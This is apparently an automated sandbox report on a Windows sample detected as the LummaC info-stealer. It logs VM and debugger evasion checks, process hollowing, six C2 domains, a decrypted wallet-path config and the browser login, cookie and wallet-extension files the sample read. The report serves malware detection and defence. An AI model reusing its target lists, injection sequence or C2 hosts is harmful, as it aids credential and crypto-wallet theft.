              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141BE28 push edx; ret 3_3_0141BE29
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141BE28 push edx; ret 3_3_0141BE29
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141BE28 push edx; ret 3_3_0141BE29
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141BE28 push edx; ret 3_3_0141BE29
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141BE28 push edx; ret 3_3_0141BE29
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_01420FEA push ebp; ret 3_3_01420FEB
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_01420FEA push ebp; ret 3_3_01420FEB
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_01420FEA push ebp; ret 3_3_01420FEB
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_01420FEA push ebp; ret 3_3_01420FEB
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_01420FEA push ebp; ret 3_3_01420FEB
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_01420FEA push ebp; ret 3_3_01420FEB
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141C440 push eax; ret 3_3_0141C441
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141BE28 push edx; ret 3_3_0141BE29
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141BE28 push edx; ret 3_3_0141BE29
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141BE28 push edx; ret 3_3_0141BE29
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141BE28 push edx; ret 3_3_0141BE29
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_0141BE28 push edx; ret 3_3_0141BE29
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_01420FEA push ebp; ret 3_3_01420FEB
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 3_3_01420FEA push ebp; ret 3_3_01420FEB
              Source: C:\Users\user\Desktop\8ZVMneG.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\8ZVMneG.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exe TID: 1492Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exe TID: 5780Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00EDD2A7 FindFirstFileExW,0_2_00EDD2A7
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00EDD358 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00EDD358
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: 8ZVMneG.exe, 00000003.00000003.2483528838.000000000136C000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000002.2484524234.000000000136C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: 8ZVMneG.exe, 00000003.00000002.2484637162.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2440225330.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2272506156.00000000013B4000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2427807404.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2483778671.00000000013B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: 8ZVMneG.exe, 00000003.00000003.2354821190.0000000003C6D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: 8ZVMneG.exe, 00000003.00000003.2354925404.0000000003C60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\8ZVMneG.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00ED3C11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00ED3C11
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00EF21A9 mov edi, dword ptr fs:[00000030h]0_2_00EF21A9
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00EF55D0 mov edi, dword ptr fs:[00000030h]0_2_00EF55D0
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00ED8D25 GetProcessHeap,0_2_00ED8D25
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00ECB290 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00ECB290
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00ED3C11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00ED3C11
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00ECB64C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00ECB64C
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00ECB640 SetUnhandledExceptionFilter,0_2_00ECB640

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Contains functionality to inject code into remote processes
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00EF21A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00EF21A9
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\8ZVMneG.exeMemory written: C:\Users\user\Desktop\8ZVMneG.exe base: 400000 value starts with: 4D5AJump to behavior
              LummaC encrypted strings found
              Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
              Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
              Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
              Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
              Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
              Source: 8ZVMneG.exe, 00000000.00000002.2160722353.0000000002A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bellflamre.click
              Source: C:\Users\user\Desktop\8ZVMneG.exeProcess created: C:\Users\user\Desktop\8ZVMneG.exe "C:\Users\user\Desktop\8ZVMneG.exe"Jump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00EDC8FD
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: GetLocaleInfoW,0_2_00ED806C
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: EnumSystemLocalesW,0_2_00EDC862
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: GetLocaleInfoW,0_2_00EDCBAF
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: EnumSystemLocalesW,0_2_00EDCB50
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: GetLocaleInfoW,0_2_00EDCCCF
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: EnumSystemLocalesW,0_2_00EDCC84
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00EDCD76
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: GetLocaleInfoW,0_2_00EDCE7C
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00EDC611
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: EnumSystemLocalesW,0_2_00ED8610
              Source: C:\Users\user\Desktop\8ZVMneG.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeCode function: 0_2_00ECC367 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00ECC367
              Source: C:\Users\user\Desktop\8ZVMneG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: 8ZVMneG.exe, 00000003.00000003.2440225330.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2427807404.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000003.00000003.2427078648.0000000003C1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\8ZVMneG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: 8ZVMneG.exe PID: 2144, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: 8ZVMneG.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
              Source: 8ZVMneG.exe, 00000003.00000003.2402901054.0000000001408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t"$g
              Source: 8ZVMneG.exeString found in binary or memory: Jaxx Liberty
              Source: 8ZVMneG.exe, 00000003.00000003.2402901054.0000000001408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],
              Source: 8ZVMneG.exe, 00000003.00000003.2402901054.0000000001408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20
              Source: 8ZVMneG.exeString found in binary or memory: ExodusWeb3
              Source: 8ZVMneG.exe, 00000003.00000002.2484637162.00000000013B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: 8ZVMneG.exeString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: 8ZVMneG.exe, 00000003.00000003.2423748589.0000000001414000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\8ZVMneG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
